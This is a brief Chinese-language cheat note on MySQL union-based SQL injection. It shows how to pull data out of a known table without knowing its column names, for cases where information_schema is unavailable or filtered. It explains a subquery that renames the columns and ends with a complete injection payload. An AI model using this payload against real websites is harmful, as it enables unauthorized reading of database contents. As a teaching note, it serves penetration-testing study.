場景
有某些情況,可以查找到表名,但查找不到列名。
MySQL < 5 或 web過濾 information_scema
詳解
select `1` from (select 1,2,3,4,5,6,7,8,9,10,11,12,13 union select * from 表名)a limit 1,1
子查詢中select的數目為列數。
通過列數 1,2,3... 再union帶出整張表數據。這一步的目的是改變/替換字段名(替換為1,2,3,4...)。
再通過select `1`帶出第一列數據。
再加上limit 1,1 帶出單一一個數據。
完整
and -1 union select 1,(select `1` from (select 1,2,3,4,5,6,7,8,9,10,11,12,13 union select * from 表名)a limit 1,1);